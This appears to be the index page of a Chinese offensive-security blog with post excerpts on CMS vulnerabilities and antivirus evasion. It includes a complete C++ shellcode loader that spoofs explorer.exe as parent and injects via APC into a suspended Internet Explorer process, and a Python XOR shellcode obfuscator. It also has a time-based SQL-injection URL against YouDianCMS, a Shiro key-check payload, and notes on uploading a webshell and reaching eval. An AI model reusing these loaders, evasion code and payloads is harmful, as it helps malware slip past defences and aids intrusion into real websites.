0%

MSBuild

Microsoft Build Engine是一个用于生成应用程序的平台。 此引擎(也称为 MSBuild)为项目文件提供了一个 XML 架构,用于控制生成平台处理和生成软件的方式。

阅读全文 »

文件上传漏洞

\App\Lib\Action\AdminBaseAction.class.php

漏洞成因,因为可上传zip文件,并且会将其解压,解压时有限制模板内不能包含php、jsp、aspx等文件,但又排除了common_en.php和common_cn.php文件,所以可以将这两个文件内容更改为webshell上传。(需后台权限)

阅读全文 »

Shiro-POC检测

使用key加密反序列二进制数据,,当key正确时,响应包不会返回deleteMe。

1
b'\xac\xed\x00\x05sr\x002org.apache.shiro.subject.SimplePrincipalCollection\xa8\x7fX%\xc6\xa3\x08J\x03\x00\x01L\x00\x0frealmPrincipalst\x00\x0fLjava/util/Map;xppw\x01\x00x'
阅读全文 »

test

test2

免杀-PPID Spoofing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#include <windows.h>
#include <TlHelp32.h>
#include <iostream>

DWORD getParentProcessID() {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 process = { 0 };
process.dwSize = sizeof(process);

if (Process32First(snapshot, &process)) {
do {
//If you want to another process as parent change here
if (!wcscmp(process.szExeFile, L"explorer.exe"))
break;
} while (Process32Next(snapshot, &process));
}

CloseHandle(snapshot);
return process.th32ProcessID;
}

int main() {

unsigned char shellCode[] = "";

STARTUPINFOEXA sInfoEX;
PROCESS_INFORMATION pInfo;
SIZE_T sizeT;

HANDLE expHandle = OpenProcess(PROCESS_ALL_ACCESS, false, getParentProcessID());

ZeroMemory(&sInfoEX, sizeof(STARTUPINFOEXA));
InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
sInfoEX.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
InitializeProcThreadAttributeList(sInfoEX.lpAttributeList, 1, 0, &sizeT);
UpdateProcThreadAttribute(sInfoEX.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &expHandle, sizeof(HANDLE), NULL, NULL);
sInfoEX.StartupInfo.cb = sizeof(STARTUPINFOEXA);

CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, reinterpret_cast<LPSTARTUPINFOA>(&sInfoEX), &pInfo);

LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pInfo.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
SIZE_T *lpNumberOfBytesWritten = 0;
BOOL resWPM = WriteProcessMemory(pInfo.hProcess, lpBaseAddress, (LPVOID)shellCode, sizeof(shellCode), lpNumberOfBytesWritten);

QueueUserAPC((PAPCFUNC)lpBaseAddress, pInfo.hThread, NULL);
ResumeThread(pInfo.hThread);
CloseHandle(pInfo.hThread);

return 0;
}

效果

1

PHP代码审计入门-youdiancms9.1

sql注入

App/Lib/Action/Admin/AreaAction.class.php

与之前旧版本8.0相同位置仍存在sql注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function index(){
header("Content-Type:text/html; charset=utf-8");
$AreaID = empty($_REQUEST['id']) ? 0 : $_REQUEST['id'];
$Parent = $AreaID; //当前区域的父级
$Grand = 0; //当前区域的爷爷
$m = D("Admin/Area");
$data = $m->getArea($AreaID);
if(!empty($data)){
$n = count($data);
for($i=0; $i<$n; $i++){
$data[$i]['ChildCount'] = $m->getChildCount( $data[$i]['AreaID'] );
}
}

if($Parent>0){
$Grand = $m->where("AreaID={$Parent}")->getField('Parent');
}

复现:

http://127.0.0.1/index.php/Admin/area/index/id/2%20AND%20(SELECT%209380%20FROM%20(SELECT(SLEEP(10)))DAOl)

sqlmap

xor混淆shellcode

1
2
3
4
5
6
7
8
9
10
with open('shellcode.raw','rb') as shellcodeFileHandle:
shellcodeBytes = bytearray(shellcodeFileHandle.read())
Key = ranstr(3)
keyAsInt = list(map(ord,Key))
Length = len(Key)
data = bytes(bytearray(((shellcodeBytes[i] ^ keyAsInt[i % Length]) for i in range(0,len(shellcodeBytes)) )))
shellcode = "\\x"
shellcode += "\\x".join(format(b,'02x') for b in data)
print("\nXOR_Shellcode:\n" + shellcode)
print("\nXOR_Key:\n" + Key)

PHP代码审计入门-YCCMS3.3

代码执行

public\class\Factory.class.php

eval()中有$_a传入参数
file_exists() 函数检查文件或目录是否存在。如果为真则返回 true
这里可以看到当路径检测为true是取反继续将参数传入eval执行

阅读全文 »